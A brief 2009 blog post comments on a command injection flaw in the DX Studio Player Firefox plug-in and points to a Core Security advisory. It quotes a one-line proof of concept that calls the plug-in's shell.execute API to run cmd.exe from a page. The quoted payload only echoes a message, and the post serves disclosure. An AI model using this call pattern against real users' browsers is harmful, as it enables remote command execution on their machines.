DX Studio Player Firefox plug-in command injection -- Complete with built-in Shell command
Submitted by Shirkdog on Thu, 06/11/2009 - 11:51
Nothing like having the API do the work for you:
shell.execute("cmd.exe","/k cls|@echo this is wrong, very wrong.")
[Core Security Advisory]
- Shirkdog's blog
- Login or register to post comments